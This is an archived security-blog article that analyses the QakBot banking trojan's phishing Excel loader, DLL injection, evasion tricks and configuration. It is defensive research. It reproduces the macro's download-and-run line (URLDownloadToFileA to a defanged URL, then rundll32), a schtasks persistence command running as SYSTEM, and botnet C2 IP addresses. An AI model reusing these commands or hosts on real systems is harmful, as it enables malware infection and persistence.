{
	"id": "3f1b1018-646e-4bd1-932f-32f3b89a6e6e",
	"created_at": "2026-04-06T00:15:58.079391Z",
	"updated_at": "2026-04-10T13:12:17.727396Z",
	"deleted_at": null,
	"sha1_hash": "9555a90b4751d027ff483dca4a4f82b37ea2a012",
	"title": "A taste of the latest release of QakBot...........................",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 5901708,
	"plain_text": "A taste of the latest release of QakBot...........................\r\nBy Pierluigi Paganini\r\nPublished: 2021-05-06 · Archived: 2026-04-02 12:21:58 UTC\r\nA taste of the latest release of QakBot – one of the most popular and mediatic trojan\r\nbankers active since 2007.\r\nThe malware QakBot, also known as Qbot, Pinkslipbot, and Quakbot is a banking trojan that has been made headlines since\r\n2007. This piece of malware is focused on stealing banking credentials and victim’s secrets using different techniques tactics\r\nand procedures (TTP) which have evolved over the years, including its delivery mechanisms, C2 techniques, and anti-analysis and reversing features.\r\nEmotet is known as the most popular threat distributing QakBot in the wild, nonetheless, Emotet has been taken down\r\nrecently, and QakBot operators are using specially target campaigns to disseminate this threat around the globe. Figure 1\r\nshows two email templates distributing QakBot in Portugal in early May 2021.\r\nFigure 1: Email template of QakBot malware targeting Portuguese Internet end users – May 2021.\r\nh/t @MiguelSantareno – malware submitted on 0xSI_f33d\r\nAdditionally, QakBot is able to move laterally on the internal environment for stealing sensitive data, making internal\r\npersistence, or even for deploying other final payloads like ransomware. In recent reports, it could be used to drop other\r\nmalware such as ProLock and Egregor ransomware. At the moment, and after the Emotet takedown, QakBot becoming one\r\nthe most prominent and observed threats allowing criminals to gain a foothold on internal networks. In the next workflow,\r\nwe can learn how the QakBot infection chain works.\r\nhttps://securityaffairs.co/wordpress/117558/cyber-crime/qakbot-latest-release.html\r\nPage 1 of 13\n\nFigure 2: High-level diagram of QakBot malware and its capabilities.\r\nQakBot is disseminated these days using target phishing campaigns in several languages, including Portuguese. The\r\ninfection chain starts with an URL in the email body that downloads a zip archive containing an XLM or XLSM file (Excel)\r\nthat takes advantage of XLM 4.0 macros to download the 2nd stage from the compromised web servers.\r\nThe 2nd stage – in a form of a DLL with random extension – is loaded into the memory using the DLL injection technique\r\nvia rundll32.exe Windows utility. After that, the final payload (QakBot itself) is loaded in memory and the malicious activity\r\nis then initiated. The malware is equipped with a list of hardcoded IP addresses from its botnet, and it receives commands\r\nand updates from the C2 server, including the deployment of additional payloads like ransomware.\r\nDribbling AVs with XLM macros \r\nThe malicious Office document, when opened, it poses as a DocuSign file – a popular software for signing digital\r\ndocuments. The malicious documents take advantage of Excel 4.0 macros (XML macros) stored in hidden sheets that\r\ndownload the QakBot 2nd stage payload from the Internet – malicious servers compromised by criminals. Then, the DLL is\r\nwritten to disk and executed using the DLL injection technique via regsvr32 or rundll32 utilities.\r\nhttps://securityaffairs.co/wordpress/117558/cyber-crime/qakbot-latest-release.html\r\nPage 2 of 13\n\nFigure 3: Excel document used to lure victims and download and execute the QakBot 2nd stage.\r\nAccording to a publication by ReversingLabs, “among 160,000 Excel 4.0 documents, more than 90% were classified by\r\nTitaniumCloud as malicious or suspicious“.\r\n(…) if you encounter a document that contains XLM macros, it is almost certain that its macro will be malicious, RL\r\nconcluded.\r\nSample Classification Count Percentage\r\nGoodware 14458 9.1%\r\nSuspicious 738 0.5%\r\nMalicious 144052 90.4%\r\nTotal 159248 100%\r\nTable 1: Classification and distribution of documents containing XLM macros (source).\r\nThe malware families detected in the sample set by RL show that ZLoader and Quakbot are the dominant malware families\r\nin the Excel 4.0 malware ecosystem.\r\nFigure 4: Malware family distribution using XLM macros in the wild (source).\r\nXLSM file – QakBot loader\r\nFilename: catalog-1712981442.xlsm\r\nMD5: f86c6670822acb89df1eddb582cf0e90\r\nCreation time: 2021-04-29 22:18:33\r\nAn XLSM file is a macro-enabled spreadsheet created by Microsoft Excel, a widely-used spreadsheet program included in\r\nthe Microsoft Office suite. These kinds of files contain worksheets of cells arranged by rows and columns as well as\r\nembedded macros.\r\nThe compressed Microsoft Excel filenames appear to follow a naming convention beginning with document-\r\n or catalog-, followed by several digits and the .xlsm or .xls extension, for example, catalog-1712981442.xlsm.\r\nInitially, the Excel document prompts the victim for enabling macros to start the infection chain. In detail, the Excel\r\nspreadsheet contains hidden spreadsheets – Excel 4.0 macros, spreadsheet formulas, and BIFF record all with the goal of\r\npassing a wrong visual inspection for the final user and malware analysts.\r\nhttps://securityaffairs.co/wordpress/117558/cyber-crime/qakbot-latest-release.html\r\nPage 3 of 13\n\nFigure 5: Only the first sheet appears when the XLSM file is opened in order to obfuscate the malicious content from the\r\neyes of the malware researchers.\r\nLooking at the internal XML files that are part of the Excel XLSM file, we can easily identify that exist other sheets hidden\r\ninside the document, as highlighted in Figure 6.\r\nFigure 6: Discovering other hidden sheets inside the internal structure of the malicious XLSM doc file.\r\nFrom the content highlighted above, we can see the names “Sheet1“, “Sheet2“, “Sheet3” and “Sheet4” as the total of sheets\r\navailable in the document, and also that “Sheet2” will trigger something when the document is opened using the feature\r\n“xlnm.Auto_Open” call.\r\nIn short, this type of malicious documents will usually have a cell as “Auto_Open cell”, and its functionality is very similar\r\nto the “Sub AutoOpen()” function in VBA to automatically run macros when the victim press the “Enable Content” button\r\nat the start.\r\nJust a way to confirm we are facing a malicious document, we investigated the internal file: shareString.xml – which\r\nusually contains interesting stuff such as hardcoded strings, URLs, and so on.\r\nBingo!\r\nhttps://securityaffairs.co/wordpress/117558/cyber-crime/qakbot-latest-release.html\r\nPage 4 of 13\n\nFigure 7: Hardcoded URLs used to download the QakBot 2nd stage via URLDownloadtoFile call and execute it\r\nusing rundll32.\r\nFrom this point, we know that the 2nd stage will be downloaded from the previous URLs using\r\nthe URLDownloadtoFile call, but some content seems a bit obfuscated. This is the interesting part that makes XLM macros\r\na potent initial stage to start malware infection chains.\r\nDigging into the details, we can observe that several combinations and operations in documents cells are performed to\r\nconcatenate the final string that will execute the QakBot DLL (2nd stage) into the memory.\r\nFigure 8: Malicious code responsible for starting the QakBot 2nd stage and available on several hidden sheets.\r\nPart of the strings extracted from the malicious Excel file are presented below:auto_open:\r\nauto_open: auto_open-\u003eSheet2!$AO$115 SHEET: Sheet2, Macrosheet CELL:AO134 , =SET.VALUE(AY120,AV131\u0026AV132\u0026A\r\nIn order to understand in detail and reveal the clear source code, we need to learn about the BIFF8 format. Some details and\r\nworkarounds were also shared in an old campaign involving the FlawedAmmyy malware here.\r\nAccording to the XLM specification by Microsoft available here, all the information about the sheet, including its name,\r\ntype, and stream position is kept within a BOUNDSHEET record (85h). Figure 9 shows how a Sheet type is defined and\r\nthe Hidden status possible flags:\r\n00h:  visible \r\n01h:  hidden \r\n02h:  very hidden \r\nhttps://securityaffairs.co/wordpress/117558/cyber-crime/qakbot-latest-release.html\r\nPage 5 of 13\n\nFigure 9: BIFF format and BOUNDSHEET information (85h), including sheet type and its possible status.\r\nBy analyzing the XLSM document, we can see in Figure 10 that only the first BOUNDSHEET ( 0x09 0xF0 0x00\r\n0x00 ) has the hidden status as visible – 0x00h. The other BOUNDSHEETS are defined as very hidden using the hex\r\nvalue 0x02h.\r\nFigure 10: Internal details about the malicious BOUNDSHEETS and hidden states.\r\nDigging into the details, four BOUNDHSEET records means that the document has four sheets, but three of them are very\r\nhidden. Using a common HEX editor, we can change the values and fix the target XLSM file as depicted in Figure 11.\r\nFigure 11: Patching the XLSM malicious file to unhide all the sheets.\r\nAs highlighted above, the values of the last bytes 0x02h and 0x01h were changed to 0x00h and 0x00h on the\r\nBOUNDSHEET related to Sheet2. The same process was done to the other BOUNDSHEETS. By opening again the\r\nhttps://securityaffairs.co/wordpress/117558/cyber-crime/qakbot-latest-release.html\r\nPage 6 of 13\n\nmalicious file, we can see now that all the sheets are available and also navigate through the source code spread on random\r\ncells.\r\nFigure 12: Souce code available on the revealed Sheets.\r\nDuring the code analysis, we found that criminals used another trick to make hard the analysis task. To prevent a casual\r\nvisual inspection of these values, the font color was set to white. So, before analyzing the cells, we need to change the\r\ndocument background color or the font color.\r\nBy deobfuscation the formulas and reassembling the strings back to the original form, we can learn how the malicious chain\r\nstarts:\r\nThe loader uses a VBA CALL statement to access the URLDownloadToFile function from URLMon.dll to download\r\nthe 1st stage DLL from the hardcoded URLs to the local path (..\\\\) using a random name to the file: jordji.nbvt1.\r\nNext, the DLL is loaded into the memory using the DLL injection technique via rundll32.exe utility from Windows,\r\nallowing code to be executed.\r\nCALL(URLMon,URLDownloadToFileA,JJCCBB,0,hxxps://dentistelmhurstny.]com/…,..\\\\jordji.nbvt11,0)EXEC(“rundll32\r\n..\\jordji.nbvt11,DllRegisterServer”)\r\nQakBot 2nd stage – the bait loader\r\nFilename: jordji.nbvt11\r\nOriginal filename: rwenc.dll\r\nMD5: 7d0f6c345cdaf9e290551b220d53cd14\r\nCreation time: 2021-04-13 19:53:55\r\nThe QakBot 2nd stage is a DLL loaded in memory and its principal mission is:\r\nExecute in memory the last payload (QakBot itself)\r\nMake hard the malware analysis, seems a legitimate file, and adding confusion with non-used libraries, calls,\r\nand so on.\r\nAt the first glance, this DLL seems very simple, with just a few calls present on the Import Address Table (IAT).\r\nNonetheless, something caught our eyes, the triple chain: LoadLibraryA, VirtualAlloc, and VirtualProtect. No doubt, we\r\nare facing a DLL injection technique and another payload is going to be executed in memory.\r\nhttps://securityaffairs.co/wordpress/117558/cyber-crime/qakbot-latest-release.html\r\nPage 7 of 13\n\nFigure 13: QakBot 2nd stage, its import table (IAT), and the well-known calls used in the DLL injection technique.\r\nGotcha!\r\nFigure 14: QakBot final stage dumped from memory.\r\nThe art of confusion … playing with bins\r\nIn another sample we have analyzed (9b1a02189e9bdf9af2f026d8409c94f7), the process of injecting the last payload into\r\nthe memory is very similar, but the loader was developed in Delphi – a clear sign that criminals are adding additional layers,\r\nresources, and features to make hard the QakBot identification and its analysis/detection.\r\nhttps://securityaffairs.co/wordpress/117558/cyber-crime/qakbot-latest-release.html\r\nPage 8 of 13\n\nFigure 15: Identification of Delphi forms and unknown resources (encrypted QakBot DLL).\r\nCriminals use multiple loaders like this built-in Delphi language with a lot of junk, GUI forms, and native functions from\r\nDelphi as a way of deceiving threat detection systems and hidden the last payload from the tentacles of the malware\r\nanalysts.\r\nFigure 16: A lot of Delphi native functions and forms to make hard malware detection.\r\nThe art of confusion is not new, and several trojans are using this kind of approach in their operations, such\r\nas Javali, Grandoreiro, and URSA, all of them banking trojans that come from Latin American countries.\r\nTake a look at the code, we can find that once again the LoadLibrary call is used to execute in memory the last QakBot\r\npayload. Figure 17 highlights the parts of the code responsible for loading the final payload.\r\nFigure 17: DLL injection technique used to load the last QakBot payload into the memory.\r\nWe got it!\r\nFigure 18: Dumping from the memory the last stage of QakBot malware.\r\nhttps://securityaffairs.co/wordpress/117558/cyber-crime/qakbot-latest-release.html\r\nPage 9 of 13\n\nThere is no doubt, it is the same payload just compiled on a different date (another release).\r\nFigure 19: PE information about the QakBot last stage (stager_1.dll).\r\nQakBot last stage – The beast\r\nThe last stage of this chain – QakBot itself – is also a DLL built with Microsoft Visual C++, the original name\r\nis stager_1.dll, and it exports only the function: DllRegisterServer. The easy way to identify the last release of the QakBot\r\nDLL, it’s looking at the two resources named “118” (C2 list) and “524” (bot config) encrypted using the RC4 algorithm.\r\nFigure 20: Resources name found in the last release of the QakBot DLL.\r\nAn interesting detail regarding this new release is that QakBot tries to decrypt the configuration as usual. Initially, it takes\r\nthe first 20 bytes of the resource and uses it as the RC4 key. After that, it takes 20 bytes from the decrypted blob and uses the\r\nbytes as a SHA1 verification for the rest of the decrypted data.\r\nThe fresh method starts here. Every time the SHA1 validations fail, QakBot tries the new decryption method. In sum, it uses\r\nthe SHA1 PowerShell path hardcoded inside the binary as an RC4 key. This new approach involves the new\r\ncampaigns: biden, clinton, and tr and was introduced in the 401 major\r\nversion.\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nSome samples of QakBot trojan are signed PE files with a valid signature issued by several CAs. For example, we can see\r\nthis sample (cd1ab264088207f759e97305d8bf847d) is signed by Sectigo – a well-known CA also abused by developers of\r\nother kinds of threats in the past.\r\nA popular technique used by criminals to make complicated and to waste the reverse engineer’s time analyzing is the junk\r\ncode insertion. In this sense, QakBot is not an exception. The malware author added a lot of API calls that alternates\r\nbetween the real instructions – to enlarge the analysis time-consuming and cause disturbing when the malware executes in a\r\nsandbox environment.\r\nAnother interesting detail is that the developers of QakBot added a non-standard calling convention that makes it difficult to\r\nunderstand and recognize the real parameters passed to the functions. The common standard calling conventions\r\nare cdecl, stdcall, thiscall or fastcall.\r\nThe strings inside the QakBot are encrypted, decrypted in run-time, and destroyed after use (like the mediatic Emotet).\r\nSome of the strings hardcoded inside the DLL are presented below.\r\nAs observed below, the strings are encrypted and stored in a continuous blob. The decryption function accepts an argument:\r\nindex to the string; and then XORed it with a hardcoded byte array.\r\nAfter this point, some strings will be decrypted in run-time and also the API functions via a pre-computed hash based on the\r\nAPI functions that will resolve calls dynamically. More details about this can be found in this great article by the VinCSS\r\nblog.\r\nAlso important to highlight some anti-debugging and protection mechanisms used by this piece of malware. Also stated by\r\nVinCSS analysis, “if the victim machine uses Kaspersky protection (avp.exe process), QakBot will inject code into\r\nmobsync.exe instead of explorer.exe.“. We can find more details and target processes in Figure 27 below.\r\nThe full list of target processes can be found below:\r\nhttps://securityaffairs.co/wordpress/117558/cyber-crime/qakbot-latest-release.html\r\nPage 10 of 13\n\nccSvcHst.exeavgcsrvx.exeavgsvcx.exeavgcsrva.exeMsMpEng.exemcshield.exeavp.exekavtray.exeegui.exeekrn.exebdagen\r\nDuring this analysis, QakBot injected a new payload in the target process “explorer.exe” and then a scheduled task was\r\ncreated as a persistence mechanism using schtasks.exe Windows utility.”C:\\Windows\\system32\\schtasks.exe” /Create /RU\r\n“NT AUTHORITY\\SYSTEM” /tn vcjscfpqk /tr “regsvr32.exe -s \\”C:\\Users\\Admin\\AppData\\Local\\Temp\\k.exe.dll\\”” /SC\r\nONCE /Z /ST 01:34 /ET 01:46\r\nFigure 28:  Process flow of the QakBot execution.\r\nIn addition, the QakBot DLL will be loaded every time using the Register Server utility, regsvr32.exe, with the following\r\nparameters:\r\n/Create: schedules a new task\r\n/RU “NT AUTHORITY\\\\SYSTEM”: executes the task with elevated system privileges\r\n/tn \u003cRANDOM_STRING\u003e: specifies the task name, seemingly using a random string\r\n/tr “regsvr32.exe -s \\\\”\u003cPAYLOAD\u003e”: the process to be executed, in this case, regsvr32 is passed a malicious\r\ndynamic link library (DLL)\r\n/SC ONCE: task scheduled to execute once at the specified time\r\n/Z: delete the task upon completion of the schedule\r\n/ST \u003cNow + 3 minutes as hh:mm\u003e: start time, used by the ONCE schedule; and\r\n/ET \u003cNow + 15 minutes as hh:mm\u003e: end time, used by the ONCE schedule.\r\nBotnet hardcoded IP Addresses\r\nCampaign: 1618935072\r\nBotnet: tr\r\nVersion: 402.12\r\nURL tria.ge: https://tria.ge/210502-aek3yedsfj\r\nBotnet full\r\nlist:140.82.49.12:443190.85.91.154:44396.37.113.36:99371.41.184.10:3389186.31.46.121:44373.25.124.140:2222109.12.111.14:44324.229.150.54:9954\r\nBotnet and campaign identifiers\r\nThe following botnet and campaign identifiers have been observed last weeks (since March 2021) with those behind Qakbot\r\nrecently using US President names:abc025 – 1603896786biden01 – 1613753447biden02 – 1614254614biden03 –\r\n1614851222biden09 – 1614939927obama07 – 1614243368obama08 – 1614855149obama09 – 1614939797tr –\r\n1614598087tr – 1618935072\r\nMitre Att\u0026ck Matrix\r\nTactic ID Name Description\r\nDefense Evasion T1027\r\nObfuscated Files or\r\nInformation\r\nQakBot XLM files are\r\nobfuscated and sheets are\r\nhidden.\r\nDefense Evasion T1027.002\r\nObfuscated Files or\r\nInformation: Software Packing\r\nEvery binary and config is\r\nobfuscated and encrypted\r\nusing RC4 cipher.\r\nhttps://securityaffairs.co/wordpress/117558/cyber-crime/qakbot-latest-release.html\r\nPage 11 of 13\n\nExecution,\r\nPersistence,\r\nPrivilege Escalation\r\nT1053 Scheduled Task/Job\r\nQakBot creates tasks to\r\nmaintain persistence.\r\nExecution,\r\nPersistence,\r\nPrivilege Escalation\r\nT1053.005\r\nScheduled Task/Job: Scheduled\r\nTask\r\nQakBot uses this TTP as a\r\nway of executing every time\r\nthe malicious DLL.\r\nDefense Evasion,\r\nPrivilege Escalation\r\nT1055 Process Injection\r\nQakBot uses Process\r\nInjection to load into the\r\nmemory some payloads.\r\nDefense Evasion,\r\nPrivilege Escalation\r\nT1055.001\r\nProcess Injection: Dynamic-link Library Injection\r\nDLL injection is used to load\r\nQakBot via rundll32\r\nWindows utility.\r\nCollection,\r\nCredential Access\r\nT1056 Input Capture\r\nQakBot collects credentials\r\nand sensitive data from the\r\nvictim’s devices.\r\n Discovery T1057 Process Discovery\r\nQakBot performs process\r\ndiscovery.\r\nDiscovery T1082 System Information Discovery\r\nQakBot obtains the list of\r\nprocesses and other details.\r\nDiscovery,  Defense\r\nEvasion\r\nT1497 Virtualization/Sandbox Evasion\r\nAnti-VM and sandbox\r\ntechniques are used to evade\r\ndetection.\r\nDiscovery,  Defense\r\nEvasion\r\nT1497.003\r\nVirtualization/Sandbox\r\nEvasion: Time Based Evasion\r\nTime-based evasion is\r\nchecked during the malware\r\nrun time.\r\nDiscovery T1518 Software Discovery\r\nA list of the installed software\r\nis obtained.\r\nDiscovery T1518.001\r\nSoftware Discovery: Security\r\nSoftware Discovery\r\nInstalled AVs and other\r\nsecurity software are\r\nobtained.\r\nFinal Thoughts\r\nQakBot is a sophisticated trojan designed to collect banking information from victims’ devices. This piece of malware is\r\ntargeting mostly US organizations and it is equipped with a variety of evasion and info-stealing routines as well as worm-like functions to make it persistent. In recent reports, it could be used to drop other malware such as ProLock, Egregor\r\nransomware.\r\nQakBot is a challenging threat with capabilities to avoid dynamic analysis in automatic sandboxes with the delayed\r\nexecutions present in its dropper as well as other tricks. With this capability in place, interactive sandboxes, for instance,\r\nwon’t extract IoCs and artifacts from the malware easily.\r\nLast but not least, thanks to all the guys who contributed to this analysis and mentioned in the reference section below.\r\nAdditional details are available in the original analysis published by Pedro Tavares on his blog:\r\nhttps://seguranca-informatica.pt/a-taste-of-the-latest-release-of-qakbot/#.YJOjUrUzY2y\r\nAbout the author: Pedro Tavares\r\nPedro Tavares is a professional in the field of information security working as an Ethical Hacker/Pentester, Malware\r\nResearcher and also a Security Evangelist. He is also a founding member at CSIRT.UBI and Editor-in-Chief of the security\r\ncomputer blog seguranca-informatica.pt.\r\nFollow me on Twitter: @securityaffairs and Facebook\r\n[adrotate banner=”9″] [adrotate banner=”12″]\r\nPierluigi Paganini\r\n(SecurityAffairs – hacking, QakBot)\r\nhttps://securityaffairs.co/wordpress/117558/cyber-crime/qakbot-latest-release.html\r\nPage 12 of 13\n\n[adrotate banner=”5″]\r\n[adrotate banner=”13″]\r\nSource: https://securityaffairs.co/wordpress/117558/cyber-crime/qakbot-latest-release.html\r\nhttps://securityaffairs.co/wordpress/117558/cyber-crime/qakbot-latest-release.html\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://securityaffairs.co/wordpress/117558/cyber-crime/qakbot-latest-release.html"
	],
	"report_names": [
		"qakbot-latest-release.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434558,
	"ts_updated_at": 1775826737,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9555a90b4751d027ff483dca4a4f82b37ea2a012.pdf",
		"text": "https://archive.orkl.eu/9555a90b4751d027ff483dca4a4f82b37ea2a012.txt",
		"img": "https://archive.orkl.eu/9555a90b4751d027ff483dca4a4f82b37ea2a012.jpg"
	}
}